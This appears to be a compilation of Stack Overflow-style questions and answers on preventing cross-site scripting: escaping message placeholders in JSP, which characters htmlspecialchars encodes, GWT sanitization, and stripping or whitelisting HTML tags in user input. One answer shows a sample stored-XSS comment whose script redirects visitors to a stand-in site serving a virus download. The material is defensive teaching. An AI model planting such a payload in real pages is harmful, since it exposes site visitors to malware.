Given the message in a messages properties file:
message = Change relation <strong>{0}</strong> -> <strong>{1}</strong> to <strong>{2}</strong> -> <strong>{3}</strong>?
If the content of any of the placeholders is a user-influenced string, I need to HTML-escape the message to prevent a potential XSS. I do that with the c:out tag in my JSP templates; I guess I could use the htmlEscape attribute of the spring:message tag as well, but I think there's no difference.
However by doing so, I corrupt the markup in the message, <strong> etc. which leads to the output:
Change relation <strong>Peter</strong> -> <strong>Car</strong> to <strong>Carl</strong> -> <strong>Bus</strong>?
I've already read the thread here on stackoverflow but it does not address XSS.
I am thinking about these options:
1) Simply replace all <strong> tags from the messages properties files with single quotes. Then there's no problem html escaping the entire message, with the drawback of a little less highlighting of the specific parts of the message.
2) Split the message into parts which allow for separate markup in the (JSP) template. This feels like much work just to get the markup right.
Am I missing something here? Which is the better option, or is there another option?
Edit: Without html-escaping the message is, like I want it to be, like this:
Change relation Peter -> Car to Carl -> Bus?
So the html-markup as in the messages.properties file is being rendered when displayed in the template.
When escaping, the message is like above, showing me the <strong> tags instead of rendering them.
Going under the assumption that you are getting the following output:
Change relation <strong>Peter</strong> -> <strong>Car</strong> to <strong>Carl</strong> -> <strong>Bus</strong>
It looks like you are escaping your entire HTML string rather than just the part that needs to be escaped.
You should escape each {#} value on its own, and then place it into the HTML. The general values you need to escape are: <, >, ', ", and &, but use an anti-xss library and templating system if you can.
Once you've escaped all the potentially dangerous parts, you can use something like <c:out value="${msg}" escapeXml="false"/>. This is not a language/framework I know, but you need some way to output the actual HTML vs the escaped version. Whatever way you prefer should be fine as long as you properly escape the untrusted part.
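A minimal sketch of that idea in Java, assuming the message pattern itself is trusted (it comes from your own properties file) and only the placeholder values are user-influenced. The class and method names (`SafeMessageFormatter`, `escapeHtml`, `format`) are made up for illustration; in a real project an established encoder library would be a better choice than a hand-written escaper.

```java
import java.text.MessageFormat;

// Hypothetical helper: escapes each placeholder value on its own,
// then substitutes it into the trusted HTML pattern.
final class SafeMessageFormatter {

    // Escapes the five characters that are significant in HTML text and attribute values.
    static String escapeHtml(String input) {
        StringBuilder out = new StringBuilder(input.length());
        for (int i = 0; i < input.length(); i++) {
            char c = input.charAt(i);
            switch (c) {
                case '&': out.append("&amp;"); break;
                case '<': out.append("&lt;"); break;
                case '>': out.append("&gt;"); break;
                case '"': out.append("&quot;"); break;
                case '\'': out.append("&#39;"); break;
                default: out.append(c);
            }
        }
        return out.toString();
    }

    // The pattern is trusted markup; every argument is treated as untrusted text.
    static String format(String trustedPattern, String... untrustedArgs) {
        Object[] escaped = new Object[untrustedArgs.length];
        for (int i = 0; i < untrustedArgs.length; i++) {
            escaped[i] = escapeHtml(untrustedArgs[i]);
        }
        return MessageFormat.format(trustedPattern, escaped);
    }
}
```

The returned string already contains escaped values, so it would be written to the page without a second round of escaping (for example with escapeXml="false"). Note that MessageFormat treats single quotes in the pattern as quoting characters, so a pattern containing apostrophes needs them doubled.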
Related
In PHP, there is a function called htmlspecialchars() that performs the following substitutions on a string:
& (ampersand) is converted to &amp;
" (double quote) is converted to &quot;
' (single quote) is converted to &#039; (only if the flag ENT_QUOTES is set)
< (less than) is converted to &lt;
> (greater than) is converted to &gt;
Apparently, this is done on the grounds that these 5 specific characters are the unsafe HTML characters.
I can understand why the last two are considered unsafe: if they are simply "echoed", arbitrary/dangerous HTML could be delivered, including potential javascript with <script> and all that.
Question 1. Why are the first three characters (ampersand, double quote, single quote) also considered 'unsafe'?
Also, I stumbled upon this library called "he" on GitHub (by Mathias Bynens), which is about encoding/decoding HTML entities. There, I found the following:
[...] characters that are unsafe for use in HTML content (&, <, >, ", ', and `) will be encoded. [...]
(source)
Question 2. Is there a good reason for considering the backtick another unsafe HTML character? If yes, does this mean that PHP's function mentioned above is outdated?
Finally, all this raises the question:
Question 3. Are there any other characters that should be considered 'unsafe', alongside those 5/6 characters mentioned above?
Donovan_D's answer pretty much explains it, but I'll provide some examples here of how specifically these particular characters can cause problems.
Those characters are considered unsafe because they are the most obvious ways to perform an XSS (Cross-Site Scripting) attack (or break a page by accident with innocent input).
Consider a comment feature on a website. You submit a form with a textarea. It gets saved into the database, and then displayed on the page for all visitors.
Now I submit a comment that looks like this.
<script type="text/javascript">
window.top.location.href="http://www.someverybadsite.website/downloadVirus.exe";
</script>
And suddenly, everyone who visits your page is redirected to a virus download. The naive approach here is just to say: okay, well then, let's filter out some of the important characters in that attack:
< and > will be replaced with &lt; and &gt;, and now suddenly our script isn't a script. It's just some HTML-looking text.
A similar situation arises with a comment like
Something is <<wrong>> here.
Suppose a user used <<...>> for emphasis for some reason. Their comment would render as
Something is <> here.
Obviously not desirable behavior.
A less malicious situation arises with &. & is used to denote HTML entities such as &amp; and &quot; and &lt; etc. So it's fairly easy for innocent-looking text to accidentally be an HTML entity and end up looking very different and very odd to a user.
Consider the comment
I really like #455 &oacute; please let me know when they're available for purchase.
This would be rendered as
I really like #455 ó please let me know when they're available for purchase.
Obviously not intended behavior.
The point is, these symbols were identified as key to preventing most XSS vulnerabilities/bugs most of the time since they are likely to be used in valid input, but need to be escaped to properly render out in HTML.
To your second question, I am personally unaware of any way that the backtick should be considered an unsafe HTML character.
As for your third, maybe. Don't rely on blacklists to filter user input. Instead, use a whitelist of known OK input and work from there.
These characters are unsafe because in HTML < and > delimit a tag, and " and ' surround attribute values. The & is encoded because it introduces HTML entities. No other characters need to be encoded, but they can be. For example, the trademark symbol can be written as &trade;, the US dollar sign as &dollar;, and the euro as &euro;. Any emoji can be written as an HTML entity (the name for these encoded forms). You can find an explanation and examples here.
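To make the point about quotes concrete, here is a small Java sketch showing how an unescaped double quote lets a value break out of an attribute, and how escaping keeps it inside. The names `AttributeEscapingDemo`, `escapeHtml` and `inputTag` are hypothetical, and the hand-written escaper is only for illustration.

```java
// Hypothetical demo: a value placed inside a double-quoted HTML attribute.
final class AttributeEscapingDemo {

    // Ampersand is replaced first so the entities produced below are not escaped again.
    static String escapeHtml(String s) {
        return s.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace("\"", "&quot;")
                .replace("'", "&#39;");
    }

    // Builds an <input> tag; when escape is false the value is inserted verbatim.
    static String inputTag(String value, boolean escape) {
        String v = escape ? escapeHtml(value) : value;
        return "<input type=\"text\" value=\"" + v + "\">";
    }
}
```

With the input `" onmouseover="alert(1)`, the unescaped version yields `<input type="text" value="" onmouseover="alert(1)">`, which adds an event handler without using a single < or >. The escaped version keeps the whole string inside the value attribute.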
Any widget that has a setHTML method could open a hole in the security system. But suppose we validate the String and only accept a limited set of HTML tags such as <b>, <i>..., and then pass this string to the setHTML method.
Then my question is: is it still safe if we do that?
For example, we check the String text to make sure it only contains a limited set of HTML tags: <b>, </b>, <i>, </i>... If the string contains other tags, we won't let users input that text. Then we use:
html1.setHTML(text); instead of html1.setHTML(SafeHtmlUtils.fromString(text))
I don't know why html1.setHTML(SafeHtmlUtils.fromString(text)) does not generate the formatted text; it just shows plain text when I run it in Eclipse. For example
html1.setHTML(SafeHtmlUtils.fromString("<b>text</b>"))
shows the plain text <b>text</b> instead of the word "text" in bold.
You want to sanitize the HTML, not escape it. The fromString method is meant to escape the string: if a user enters a < b but forgets the space, then adds >c, you don't want the c to be bold and the b to be missing entirely. Escaping is done to actually render the string that is given, assuming it is text.
On the complete other end of the spectrum, you can use fromTrustedString which tells GWT that you absolutely trust the source of the data, and that you will allow it to do anything. This typically should not be done for any data that comes from the user.
Somewhere off to the side of all of that we have sanitization, the process where you take a string that is meant to be HTML and ensure it is safe, rather than either treating it like text or trusting it implicitly. This is hard to do well: any tag that has a style attribute could potentially attack you (this is why GWT has SafeStyle, like SafeHtml), any tag that has a uri, url or href could be used to attack (hence SafeUri), and any attribute that the browser treats as a callback, such as onclick or the like, can be used to run JavaScript. The HtmlSanitizer type is meant to be able to do this.
There is a built-in implementation of this, as of at least GWT 2.4 - SimpleHtmlSanitizer. This class whitelists certain html tags, including your <b> and <i> tags, as well as a few others. Attributes are completely removed, as there are too many cases where they might not be safe. As the class name suggests, this is just a simple approach to this problem - a more complex and in-depth approach might be more true to the original code, but this also comes with the risk of allowing unsafe HTML content.
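The whitelist idea can be sketched in plain Java without GWT. This is not the SimpleHtmlSanitizer implementation or its API, just an illustration of the same principle under a simplifying assumption: escape everything first, then restore only exact, attribute-free occurrences of the allowed tags. The class name `TagWhitelistSanitizer` and the tag list are assumptions made for the example.

```java
import java.util.List;

// Hypothetical sketch of whitelist-based sanitizing (not GWT's implementation).
final class TagWhitelistSanitizer {

    // Assumed whitelist for this example; adjust to your needs.
    private static final List<String> ALLOWED_TAGS = List.of("b", "i", "em", "strong");

    static String sanitize(String html) {
        // Step 1: treat the whole input as text and escape it.
        String result = html.replace("&", "&amp;")
                .replace("<", "&lt;")
                .replace(">", "&gt;")
                .replace("\"", "&quot;")
                .replace("'", "&#39;");
        // Step 2: restore only bare opening and closing tags from the whitelist.
        // Tags carrying attributes never match and therefore stay escaped.
        for (String tag : ALLOWED_TAGS) {
            result = result.replace("&lt;" + tag + "&gt;", "<" + tag + ">")
                           .replace("&lt;/" + tag + "&gt;", "</" + tag + ">");
        }
        return result;
    }
}
```

This sketch does not balance tags, so an unclosed <b> in the input stays unclosed in the output, and it also escapes entities the user typed on purpose. A production sanitizer has to deal with both.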
I have created a site where users can make an account by typing in a username and password. If I make an account and type <h1> dan</h1> as my username, the username shows up on the site as a header. This can lead to loads of abuse if someone were to use, say, an img src or a load of line breaks. How do I make the browser ignore the HTML tags, so that if I type <h1> dan</h1> it either gets rid of the HTML or just prints the HTML as regular text?
Various answers for some programming languages have already been given. You might want to read about the underlying techniques (as well as other common threats in web development) on http://www.owasp.org/.
Welcome to the world of security issues in web development
What you are talking about is called input validation. A lot of work has already been done on this subject, and it is never a good idea to start doing this from scratch. The most important thing to remember is that input validation has to be done on the server side, as client side can easily be manipulated.
ESAPI (by OWASP) is an open source library for web security which amongst other things lets you do Input Validation, it has implementations in many languages including PHP and Java. If you're interested in using ESAPI with Java you can take a look at my blog where I use ESAPI for input validation, if you're using another language there are examples for those on the web.
You can use strip_tags() function in PHP.
Maybe you can strip the HTML tags in your server-side code when you create the user.
Also:
I think it is a must to clean, on the server side, the values coming from the client side.
Either you'll have to get rid of all HTML tags, or, much simpler, replace all < and > characters with their HTML encodings, &lt; and &gt;.
simply output the username using htmlspecialchars().
The translations performed are:
'&' (ampersand) becomes '&amp;'
'"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set.
"'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set.
'<' (less than) becomes '&lt;'
'>' (greater than) becomes '&gt;'
You can't do this in the browser, you have to do this in your backend.
Identify allowed characters in username,password, whatever value you ask for
When the form is submitted -> validate the input against your previously defined pattern (on the server)
Escape/encode your data before it is sent to the client (browser), i.e. so that <h1> dan</h1> would become &lt;h1&gt; dan&lt;/h1&gt;
Familiarize yourself with common security concerns, such as SQL injection and cross-site scripting, and how to avoid them
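The first two steps above can be sketched in Java as a server-side check against a fixed pattern. The policy used here (3 to 20 ASCII letters, digits or underscores) and the name `UsernameValidator` are assumptions chosen for the example, not a recommendation for every site.

```java
import java.util.regex.Pattern;

// Hypothetical server-side validator for usernames.
final class UsernameValidator {

    // Assumed policy: 3 to 20 ASCII letters, digits, or underscores.
    private static final Pattern ALLOWED = Pattern.compile("[A-Za-z0-9_]{3,20}");

    // matches() requires the whole string to fit the pattern, not just a part of it.
    static boolean isValid(String username) {
        return username != null && ALLOWED.matcher(username).matches();
    }
}
```

A username such as <h1> dan</h1> is rejected before it ever reaches the database. Validation on input does not replace escaping on output; values that pass validation today may still be displayed in a context where they need encoding.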
I'm extracting some content from a website with this pattern:
([^+]+)
and it outputs
< img src=""http://www."" border=""0""/>
with double quotes. What is wrong with my query?
your problem only makes sense if you modify your regexp.
but first of all, beware:
in general, what you try to achieve is not feasible using regexes. they are the inappropriate tool to do it. you will not come up with a solution 100% correct using regexes.
having said this, try to replace ([^+]+) with (([^<!--]+([^<]|<[^!]|<![^-]|<!-[^-]))+). note that this regex assumes the following:
there are no html comments inside the message portion
there are no strings containing html comment openings inside the message portion
the message portion is a valid html fragment
(otherwise it would match eg. <!-<!-- / message -->)
you have been warned.
btw, the dquote doubling must be a standard escape mechanism of the imacro environment.
How do I limit the types of HTML that a user can input into a textbox? I'm running a small forum using some custom software that I'm beta testing, but I need to know how to limit the HTML input. Any suggestions?
i'd suggest a slightly alternative approach:
don't filter incoming user data (beyond prevention of sql injection). user data should be kept as pure as possible.
filter all outgoing data from the database, this is where things like tag stripping, etc.. should happen
keeping user data clean allows you more flexibility in how it's displayed. filtering all outgoing data is a good habit to get into (along the never trust data meme).
You didn't state what the forum was built with, but if it's PHP, check out:
http://htmlpurifier.org/
Library Features: Whitelist, Removal, Well-formed, Nesting, Attributes, XSS safe, Standards safe
Once the text is submitted, you could strip any/all tags that don't match your predefined set using a regex in PHP.
It would look something like the following:
find open tag (<)
if contents != allowed tag, remove tag (from <..>)
Parse the input provided and strip out all HTML tags that don't exactly match the list you are allowing. This can either be a complex regex, or you can do a stateful iteration through the char[] of the input string, building the allowed output string and stripping unwanted attributes on tags like img.
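A rough Java sketch of the stateful iteration described above. It walks the input once, drops every tag whose name is not in the allowed set, and rebuilds allowed tags without any attributes. The names `TagStripper`, `stripTags` and `tagName` are hypothetical, and the tag detection is deliberately simplistic (it ends a tag at the first >), so treat it as an illustration rather than a hardened filter.

```java
import java.util.Locale;
import java.util.Set;

// Hypothetical single-pass tag stripper; allowed tags are re-emitted without attributes.
final class TagStripper {

    static String stripTags(String input, Set<String> allowedTags) {
        StringBuilder out = new StringBuilder(input.length());
        int i = 0;
        while (i < input.length()) {
            char c = input.charAt(i);
            if (c != '<') {          // ordinary text is copied through
                out.append(c);
                i++;
                continue;
            }
            int close = input.indexOf('>', i);
            if (close < 0) {
                break;               // unterminated tag: drop the remainder
            }
            String inner = input.substring(i + 1, close);
            String name = tagName(inner);
            if (allowedTags.contains(name)) {
                // Rebuild the tag from its name only, discarding all attributes.
                out.append(inner.startsWith("/") ? "</" : "<").append(name).append('>');
            }
            i = close + 1;           // skip past the tag, kept or not
        }
        return out.toString();
    }

    // Extracts the lower-cased tag name; comments and malformed tags yield "".
    private static String tagName(String inner) {
        int start = inner.startsWith("/") ? 1 : 0;
        int end = start;
        while (end < inner.length() && Character.isLetterOrDigit(inner.charAt(end))) {
            end++;
        }
        return inner.substring(start, end).toLowerCase(Locale.ROOT);
    }
}
```

Because every < in the input is consumed and only whitelisted names are written back, attributes such as onerror or style never reach the output. The remaining text is not entity-escaped here, so ampersands pass through unchanged.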
Use a different code system (BBCode, Markdown)
Find some code online that already does this, to use as a basis for your implementation. For example Slashcode must perform this, so look for its implementation in the Perl and use the regexes (that I assume are there)
Regardless what you use, be sure to be informed of what kind of HTML content can be dangerous.
e.g. a < script > tag is pretty obvious, but a < style > tag is just as bad in IE, because it can invoke JScript commands.
In fact, any style="..." attribute can invoke script in IE.
< object > would be one more tag to be wary of.
PHP comes with a simple function, strip_tags, to strip HTML tags. It allows certain tags to be exempted from stripping.
Example #1 strip_tags() example
<?php
$text = '<p>Test paragraph.</p><!-- Comment --> Other text';
echo strip_tags($text);
echo "\n";
// Allow <p> and <a>
echo strip_tags($text, '<p><a>');
?>
The above example will output:
Test paragraph. Other text
<p>Test paragraph.</p> Other text
Personally, for a forum I would use BBCode or Markdown because of the amount of support and features they provide, such as live preview.